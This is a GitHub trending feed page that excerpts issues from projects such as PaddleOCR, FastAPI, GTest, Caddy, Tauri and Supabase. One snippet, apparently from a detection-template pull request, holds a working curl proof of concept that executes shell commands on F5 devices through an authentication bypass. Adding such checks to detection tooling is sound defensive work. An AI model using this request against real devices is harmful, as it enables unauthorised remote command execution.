Skip to content

Here's what's popular on GitHub today...

Trending repository

iambechitra
iambechitra commented Mar 27, 2022

I want to train paddleOCR for Bengali+English Language. But couldn't find any tutorial or reference to do so. How can i train PaddleOCR for Bangali+English Language Together.

I found a Bengali Vocab Corpora(60000+ words) in the given link bellow
https://raw.githubusercontent.com/JaidedAI/EasyOCR/master/easyocr/dict/bn.txt

also the list of Bengali latter in the given link bellow -
https://

Lua logo

Popular topic

Lua is a lightweight, embeddable scripting language.
fastapi

Trending repository

tiangolo
tiangolo commented Jun 12, 2020

First check

  • I added a very descriptive title to this issue.
  • I used the GitHub search to find a similar issue and didn't find it.
  • I searched the FastAPI documentation, with the integrated search.
  • I already searched in Google "How to X in FastAPI" and didn't find any information.
  • I already read and followed all the tutorial in the docs and didn't find an answ
enhancement good first issue confirmed
Content Creation and Design in Web3

Upcoming event recommended by GitHub

May
25

Content Creation and Design in Web3

May 25, 2022 • Online

Join us for an evening of networking, exciting announcements and all the exclusive GitHub news.

Trending repository

lukasm91
lukasm91 commented Aug 24, 2019

GTest exports the following targets:

  • GTest::gtest
  • GTest::gtest_main
  • GTest::gmock
  • GTest::gmock_main

This targets should also be available when adding gtest with add_subdirectory (or FetchContent), because this should behave the same way as adding GTest with find_package. So somewhere, we should add the aliases to these targets, i.e.

add_library(GTest::gtest ALIAS 

Trending repository

Ph33rr
Ph33rr commented May 9, 2022

Template / PR Information

add more POC

for "401 F5 Authorization Required" error we need to use host: localhost or localhost:8100

req:

curl -X POST https:///mgmt/tm/util/bash -H "X-F5-Auth-Token: a" -H "Authorization: Basic YWRtaW46" -d '{ "command":"run", "utilCmdArgs":"-c id" }' -H "Connection: keep-alive,X-F5-Auth-Token" -H "Content-Type: application/json" --insecure -v

App recommended by GitHub

Octobox

Untangle your GitHub notifications

Octobox helps you manage your notifications in the same way Gmail helps you manage your email. Built for developer workflows centred around GitHub issues, pull requests, comments and commits, Octobox makes sure you never miss another mention or misplace another issue.

caddy

Trending repository

ealib
ealib commented Mar 30, 2022

It would be a nice addition to integrate Minimal windows service stub in Caddy (built for Windows).

At the moment, it is necessary to use for example NSSM to install Caddy as a service on Windows.

See how it becomes much more natural to [install the service and remove it in the case of another project (Gitea) with the Windows tools](https:

feature good first issue
tauri

Trending repository

p32929
p32929 commented Apr 10, 2022

Describe the bug

Hello, first of all, thank you for making and maintaining Tauri.
So, 've been making a test app using Tauri. but it seems, the CTRL/COMMAND + Z keyboard shortcut ( along with many other keyboard shortcuts ) stops working inside the app.

I also have added a menu like this one: https://github.com/windht/watcher/blob/bd929e555319c3e6c4565a2631b63a04918c03fb/src-tauri/src/m

bubbletea

Trending repository

Trending repository

amarlette
amarlette commented Feb 10, 2021

Description

Position in Collection not supported by ScrollView. No components can be set as any collection role. With support for "List" or "Grid" roles would these would likely work as expected.

This issue is covered in-depth by parent issue #30977, please check there for more details.

React Native version:

0.63

Good first issue Platform: Android Component: ScrollView Accessibility

Trending repository

supabase

Trending repository

fbarthez
fbarthez commented Sep 20, 2021

Feature request

Is your feature request related to a problem? Please describe.

I'm using the SMS OTP feature for a progressive web application to be used on mobiles and would like to use the WebOTP API to automatically handle the SMS. The new templating feature gets me almost there – but only almost since it does not allow newlines (\n).

Describe

enhancement good first issue
material-ui

Trending repository

ANTARES-KOR
ANTARES-KOR commented Mar 31, 2022

Duplicates

  • I have searched the existing issues

Latest version

  • I have tested the latest version

Summary 💡

Emotion-js added a new feature 'insertionPoint' to createCache in this pull request and marked previous 'prepend' option as deprecated.

But Mui's next.js example uses prepend. [You can find It he

enhancement good first issue

App recommended by GitHub

Percy

Percy gives your team confidence in every visual UI change before it's shipped.

Percy adds visual reviews to your GitHub pull requests, helping your team spot UI bugs quickly and review visual changes easily.